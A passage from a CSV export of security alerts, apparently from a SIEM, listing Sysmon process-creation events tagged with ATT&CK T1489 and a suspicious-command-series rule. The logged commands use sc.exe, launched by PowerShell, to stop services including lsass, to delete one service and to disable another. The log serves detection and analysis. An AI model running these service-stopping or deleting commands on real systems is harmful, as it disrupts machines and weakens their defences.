CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.853771100Z"",""eventRecordID"":""3371"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.851\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001020142e00}\r\nProcessId: 2580\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.851"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-001020142e00}"",""processId"":""2580"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.749",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.824 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001079122e00} +ProcessId: 7424 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.826911800Z"",""eventRecordID"":""3369"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.824\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001079122e00}\r\nProcessId: 7424\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.824"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-001079122e00}"",""processId"":""7424"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.736",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.813 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010b0112e00} +ProcessId: 8140 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.815242300Z"",""eventRecordID"":""3368"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.813\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010b0112e00}\r\nProcessId: 8140\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.813"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-0010b0112e00}"",""processId"":""8140"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.689",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.762 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00109e0e2e00} +ProcessId: 5700 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.767660400Z"",""eventRecordID"":""3365"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.762\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00109e0e2e00}\r\nProcessId: 5700\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.762"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-00109e0e2e00}"",""processId"":""5700"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.641",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.713 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010ea0a2e00} +ProcessId: 5660 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.715399100Z"",""eventRecordID"":""3362"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.713\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010ea0a2e00}\r\nProcessId: 5660\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.713"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-0010ea0a2e00}"",""processId"":""5660"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.625",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.701 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00100a0a2e00} +ProcessId: 7396 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Microsoft Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Microsoft Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.703524600Z"",""eventRecordID"":""3361"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.701\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00100a0a2e00}\r\nProcessId: 7396\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Microsoft Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.701"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-00100a0a2e00}"",""processId"":""7396"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Microsoft Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.594",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.673 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001067082e00} +ProcessId: 5728 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.675638600Z"",""eventRecordID"":""3359"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.673\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001067082e00}\r\nProcessId: 5728\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 